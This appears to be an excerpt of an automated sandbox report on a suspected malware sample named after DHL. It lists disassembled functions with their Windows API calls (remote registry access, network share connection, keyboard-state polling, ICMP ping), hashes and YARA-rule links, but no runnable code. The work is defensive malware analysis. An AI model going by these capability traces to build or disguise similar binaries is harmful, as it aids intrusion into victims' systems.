                                                                                      • Opcode ID: 85634c65baa8d69abbfefcf5de051f9d51ee0a3a180da5e0f0803b92bd4c7d6e
                                                                                      • Instruction ID: ed1417960ead08646771d537dcf41075fb1f106b10363d5dded2caf870282b51
                                                                                      • Opcode Fuzzy Hash: 85634c65baa8d69abbfefcf5de051f9d51ee0a3a180da5e0f0803b92bd4c7d6e
                                                                                      • Instruction Fuzzy Hash: 4B117331A9425D79DB21E7A1DC4AEFF6ABCEBD1B00F400429B601A60D1EEB15E05D6B1
                                                                                      Function 00095CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00095CE2
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095CFB
                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00095D59
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00095D69
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095D7B
                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00095DCF
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00095DDD
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095DEF
                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00095E31
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00095E44
                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00095E5A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00095E67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                      • String ID:
                                                                                      • API String ID: 3096461208-0
                                                                                      • Opcode ID: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                                                                      • Instruction ID: 9237768a5c4e4bc090055c9a7e91bc410634b286fbe487dc112d48c025dbc9a6
                                                                                      • Opcode Fuzzy Hash: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                                                                      • Instruction Fuzzy Hash: E0510CB1A00605AFEF19CF69DD89EAEBBB5EB48301F148229F519E7290D7749E00DB50
                                                                                      Function 000996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00099717
                                                                                      • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099720
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00099742
                                                                                      • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099745
                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00099866
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                      • API String ID: 747408836-2268648507
                                                                                      • Opcode ID: 097481150b4e7067b0f443c068bbdbab7f955643dc31a3957185b3d9c517c304
                                                                                      • Instruction ID: f0e0551166dfc316f4fbbe0cf1552beda5dc86a4a4b49c5a205eccc7b80bf91a
                                                                                      • Opcode Fuzzy Hash: 097481150b4e7067b0f443c068bbdbab7f955643dc31a3957185b3d9c517c304
                                                                                      • Instruction Fuzzy Hash: 57413972804209AADF05EBE4CE86EEEB37CAF55340F504069F60572092EF756F48DA61
                                                                                      Function 000906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000907A2
                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000907BE
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000907DA
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00090804
                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0009082C
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00090837
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0009083C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                      • API String ID: 323675364-22481851
                                                                                      • Opcode ID: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                                                                      • Instruction ID: fefda0516a3d790ae055f1fec539230b556ba0cc1e4c753441ef00a0b108e05a
                                                                                      • Opcode Fuzzy Hash: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                                                                      • Instruction Fuzzy Hash: 1B413672D10229AFDF16EBA4DC85CEEB7B8BF04350F144129E945B3161EB709E04CBA0
                                                                                      Function 000C3C46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateMenu.USER32 ref: 000C3C79
                                                                                      • SetMenu.USER32(?,00000000), ref: 000C3C88
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3D10
                                                                                      • IsMenu.USER32(?), ref: 000C3D24
                                                                                      • CreatePopupMenu.USER32 ref: 000C3D2E
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3D5B
                                                                                      • DrawMenuBar.USER32 ref: 000C3D63
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                      • String ID: 0$F$p]
                                                                                      • API String ID: 161812096-3127141080
                                                                                      • Opcode ID: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                                                                      • Instruction ID: bb9637095a2f00cd8b3ad79d04ec6e909cc9e82f39a1efc198c18bd2fab4abe8
                                                                                      • Opcode Fuzzy Hash: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                                                                      • Instruction Fuzzy Hash: 0E415675A11609AFEB14CF64E884FAE7BB5FF4A350F14402CF94AA7360D774AA50CB90
                                                                                      Function 000B3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 000B3C5C
                                                                                      • CoInitialize.OLE32(00000000), ref: 000B3C8A
                                                                                      • CoUninitialize.OLE32 ref: 000B3C94
                                                                                      • _wcslen.LIBCMT ref: 000B3D2D
                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 000B3DB1
                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 000B3ED5
                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 000B3F0E
                                                                                      • CoGetObject.OLE32(?,00000000,000CFB98,?), ref: 000B3F2D
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 000B3F40
                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000B3FC4
                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 429561992-0
                                                                                      • Opcode ID: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                                                                      • Instruction ID: f49c25d68d58c97af2e73e69429cbfea94af3a4d45cfdb38bba1e43e42981fd1
                                                                                      • Opcode Fuzzy Hash: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                                                                      • Instruction Fuzzy Hash: 96C144716082059FD700DF68C884DABBBE9FF89744F24492DF98A9B251DB31EE05CB52
                                                                                      Function 000A7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 000A7AF3
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000A7B8F
                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 000A7BA3
                                                                                      • CoCreateInstance.OLE32(000CFD08,00000000,00000001,000F6E6C,?), ref: 000A7BEF
                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000A7C74
                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 000A7CCC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 000A7D57
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000A7D7A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 000A7D81
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 000A7DD6
                                                                                      • CoUninitialize.OLE32 ref: 000A7DDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2762341140-0
                                                                                      • Opcode ID: 0956522ee2a1d255a9b1ec35de15713414ef047bd54bd57140b8e33685ab8d7f
                                                                                      • Instruction ID: 73cb12350039057650bf679d3b36b15a0ce8277bca33355043ee7866d4c11481
                                                                                      • Opcode Fuzzy Hash: 0956522ee2a1d255a9b1ec35de15713414ef047bd54bd57140b8e33685ab8d7f
                                                                                      • Instruction Fuzzy Hash: 81C13B75A04109AFDB14DFA4C884DAEBBF9FF49314F148498F81A9B262DB31ED45CB90
                                                                                      Function 0008FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0008FAAF
                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 0008FB08
                                                                                      • VariantInit.OLEAUT32(?), ref: 0008FB1A
                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0008FB3A
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0008FB8D
                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 0008FBA1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0008FBB6
                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 0008FBC3
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBCC
                                                                                      • VariantClear.OLEAUT32(?), ref: 0008FBDE
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                      • String ID:
                                                                                      • API String ID: 2706829360-0
                                                                                      • Opcode ID: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                                                                      • Instruction ID: a97e2194223989f645a9aca7e3259a2aca0b4c129962010ce1b50839bd08a709
                                                                                      • Opcode Fuzzy Hash: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                                                                      • Instruction Fuzzy Hash: A3414075A0021A9FEB04EF64C854DFEBBB9FF48354F008069E94AA7261DB74A945CF90
                                                                                      Function 00099C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 00099CA1
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00099D22
                                                                                      • GetKeyState.USER32(000000A0), ref: 00099D3D
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00099D57
                                                                                      • GetKeyState.USER32(000000A1), ref: 00099D6C
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00099D84
                                                                                      • GetKeyState.USER32(00000011), ref: 00099D96
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00099DAE
                                                                                      • GetKeyState.USER32(00000012), ref: 00099DC0
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00099DD8
                                                                                      • GetKeyState.USER32(0000005B), ref: 00099DEA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      • Opcode ID: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                                                                      • Instruction ID: 8395430a7d9abd82758272c9ee139d26679bb37e314f5df6033502a2c8c37088
                                                                                      • Opcode Fuzzy Hash: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                                                                      • Instruction Fuzzy Hash: 60412A70505BC96DFFB087A8C8447B5BEE06F12344F08805EDAC6565C2EBE59DC8D7A2
                                                                                      Function 000B055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 000B05BC
                                                                                      • inet_addr.WSOCK32(?), ref: 000B061C
                                                                                      • gethostbyname.WSOCK32(?), ref: 000B0628
                                                                                      • IcmpCreateFile.IPHLPAPI ref: 000B0636
                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06C6
                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06E5
                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 000B07B9
                                                                                      • WSACleanup.WSOCK32 ref: 000B07BF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                      • String ID: Ping
                                                                                      • API String ID: 1028309954-2246546115
                                                                                      • Opcode ID: 5ba3ee1f2dc9e9241cfba9b895ee04e7c8eba1342c03bb2ddb0ca0f591be4783
                                                                                      • Instruction ID: 7ce1caf11426689a9e9e45dfbddc4ec291889288772abec49b16a563077bf483
                                                                                      • Opcode Fuzzy Hash: 5ba3ee1f2dc9e9241cfba9b895ee04e7c8eba1342c03bb2ddb0ca0f591be4783
                                                                                      • Instruction Fuzzy Hash: F5918E75A086019FD320CF15C888F5BBBE4EF84318F1485A9F4698B6A2CB34ED45CF91
                                                                                      Function 000B8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                      • API String ID: 707087890-567219261
                                                                                      • Opcode ID: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                                                                      • Instruction ID: 0d4d7337f921ac23cd4219ae1e1ab9611e883a0ca561204241412b627afecf51
                                                                                      • Opcode Fuzzy Hash: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                                                                      • Instruction Fuzzy Hash: CE51B131A041169BCF24DF68C9519FEB7E9BF64324B21822AE926E72D5DF31DD40C790
                                                                                      Function 000B372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32 ref: 000B3774
                                                                                      • CoUninitialize.OLE32 ref: 000B377F
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,000CFB78,?), ref: 000B37D9
                                                                                      • IIDFromString.OLE32(?,?), ref: 000B384C
                                                                                      • VariantInit.OLEAUT32(?), ref: 000B38E4
                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3936
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                      • API String ID: 636576611-1287834457
                                                                                      • Opcode ID: 0112f97aef9a5cc8c0cf0b690918559dc0106e319501bb52f651b7977a454376
                                                                                      • Instruction ID: 626913a9bfbe5f21e2d1492cf5d289d7a788ed92f3803b082cfa81f78115d974
                                                                                      • Opcode Fuzzy Hash: 0112f97aef9a5cc8c0cf0b690918559dc0106e319501bb52f651b7977a454376
                                                                                      • Instruction Fuzzy Hash: 446190B1608711AFD721DF54C889FAEB7E8EF49710F204819F5859B291DB70EE48CB92
                                                                                      Function 000C8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                        • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                                                                        • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 000C8B6B
                                                                                      • ImageList_EndDrag.COMCTL32 ref: 000C8B71
                                                                                      • ReleaseCapture.USER32 ref: 000C8B77
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 000C8C12
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C8C25
                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 000C8CFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$p]
                                                                                      • API String ID: 1924731296-2901959936
                                                                                      • Opcode ID: 70d9860e6951f6460a9bf4807396839e5b28c9f76a015ecda60774ca38e5da5b
                                                                                      • Instruction ID: 5e1dfe9bfd51562a1d7af3c8c0aeb259a0ee0f54fab25b2dca99447a9619759e
                                                                                      • Opcode Fuzzy Hash: 70d9860e6951f6460a9bf4807396839e5b28c9f76a015ecda60774ca38e5da5b
                                                                                      • Instruction Fuzzy Hash: E1514971104304AFE704DF24D996FAE77E4FB88714F400A2DF996A72E2DBB49944CB62
                                                                                      Function 000A3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 000A33CF
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
